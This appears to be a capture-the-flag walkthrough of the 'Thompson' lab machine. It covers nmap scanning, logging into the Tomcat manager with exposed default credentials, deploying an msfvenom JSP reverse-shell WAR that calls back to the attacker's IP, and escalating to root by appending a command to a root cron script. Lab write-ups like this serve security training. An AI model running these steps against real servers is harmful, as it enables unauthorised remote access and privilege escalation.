# Thompson ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQIQQgW-MxNEV7kfmp%2F-McQJ2k4ffYB79rncIY3%2Fimage.png?alt=media\&token=b227c79a-c5e9-4d1f-92b0-bc194ed6c605) ## Reconnaissance Initial nmap scan to find open ports , using the flag "treat all hosts as alive" (**-Pn**) ``` nmap -Pn 10.10.196.112 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJ7Bwd0qYH-yDl8cm%2F-McQJp4_7ZKc0Gm7SWgg%2Fimage.png?alt=media\&token=5ea0d7e5-1de1-45b1-9f9c-83890f806640) Detailed Nmap Scan : Command Breakdown: * (**-sV):** Service version * (**-sC**): Default nmap scripts * (**-p):** Specifying ports 22,8009,8080 * (**-oN nmap**): Saving it into a file called nmap ``` nmap -sV -sC -p 22,8009,8080 -oN nmap 10.10.196.112 ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJ7Bwd0qYH-yDl8cm%2F-McQJs4hzlGltGjl8JND%2Fimage.png?alt=media\&token=19217956-865c-4b04-b01a-6b67b8b1e76a) ## Enumeration Lets visit the site on port 8080 ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJtKLR2BNYERAuZlT%2F-McQKGrlKH_0ZYifdhML%2Fimage.png?alt=media\&token=f37e8c76-66cc-400c-8a65-bcc39b515479) Its a Apache Tomcat page, there is a Manager App tab, lets click it and see what it says ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJtKLR2BNYERAuZlT%2F-McQKbk1iiVDapJPf9pq%2Fimage.png?alt=media\&token=3c3de40d-3424-4bf8-ac70-1ad83b27632f) We need a username and a password, we do not have one, so lets click cancel, once we do , we get this page. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJtKLR2BNYERAuZlT%2F-McQKp8Gw-qfvV1hjdwJ%2Fimage.png?alt=media\&token=21faf68f-7854-4b8e-a0ae-136473372f30) We have a username and a password, lets use these credentials to login ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJtKLR2BNYERAuZlT%2F-McQL-cqEdCnTurgNysW%2Fimage.png?alt=media\&token=6a8dac34-8b44-4b2c-ad93-79ac5fa210b3) We are logged in. Looking through application manager, we see something interesting ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJtKLR2BNYERAuZlT%2F-McQLEnA8E2if4rw_8A2%2Fimage.png?alt=media\&token=9712d0c4-c5fb-46da-bb49-c62658bf39fa) We can upload `WAR` files, now we can make a war file payload that will give us a reverse shell on the machine. ## Exploitation Lets first make the payload, make sure to replace my IP with yours ``` msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.13.8.64 LPORT=1234 -f war > reverse.war ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQLu2SCTUd4SQG2_5V%2Fimage.png?alt=media\&token=896170d3-3464-4d50-98a9-5dd62adb8ede) Lets upload the file, click on browse and select the file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQMBiBf0nMEGrqYwWi%2Fimage.png?alt=media\&token=f0e52be9-558d-4f22-8fb3-bd499ec516cf) And hit deploy, now you should see the file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQMJoXekquobxp-0pK%2Fimage.png?alt=media\&token=02c759e9-c58e-447e-8e72-ac7f438083c6) Now lets start a netcat listener ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQMPOGjGCkW9qV34ve%2Fimage.png?alt=media\&token=9a17dc45-f60e-4252-a9fe-8062731e4e43) Now click on the file and you should get a reverse shell ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQMVkL9gbL8NYFInUJ%2Fimage.png?alt=media\&token=1e1a408b-5b66-487f-b80e-dfced611bc52) Lets stabilize the shell with these commands ``` python -c 'import pty; pty.spawn("/bin/bash")' Ctrl + Z stty raw -echo; fg reset Ctrl + z ``` ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQNJeTivXRNZYeeuzR%2Fimage.png?alt=media\&token=fd856c93-6c66-4ef3-b922-b793889e56cf) We can read the `user.txt` file ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQNp3X3T98Lfb0qzY3%2Fimage.png?alt=media\&token=c588f9db-e041-4b33-8f89-f5df306b149b) We have two other files in the directory, lets look at what they contain ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQNqieiMk-OeGzXOlG%2F-McQO1VMc4u-gJFY6W-7%2Fimage.png?alt=media\&token=ae8d38a2-49ff-413c-8f56-b05e2b817c2f) It looks like the `id.sh` file is running the id command and sending the output to the file called `test.txt`. Lets check the cronjobs running on this machine ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQNqieiMk-OeGzXOlG%2F-McQP9mTQXDlJ51OW780%2Fimage.png?alt=media\&token=c6434dcb-2ad1-4968-8c44-c9bb8cf2baec) Looks like it is reading the files in `/home/jack`, so lets transfer the root flag to this directory by adding the command in the `id.sh` file and then read it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQNqieiMk-OeGzXOlG%2F-McQPrIjHNRRp0fX3NZ5%2Fimage.png?alt=media\&token=576a3d7b-c6c6-4c0f-8a48-633a7d4c5654) We can edit the file using `nano` or we can use this command ``` echo "cp /root/root.txt /home/jack/root.txt" >> id.sh ``` Once we do this, we should see the `root.txt` file in our directory and we can read it. ![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQNqieiMk-OeGzXOlG%2F-McQQFTwc4R2_YleMchf%2Fimage.png?alt=media\&token=82b8b8b6-0d39-4389-bd8b-92454275f695)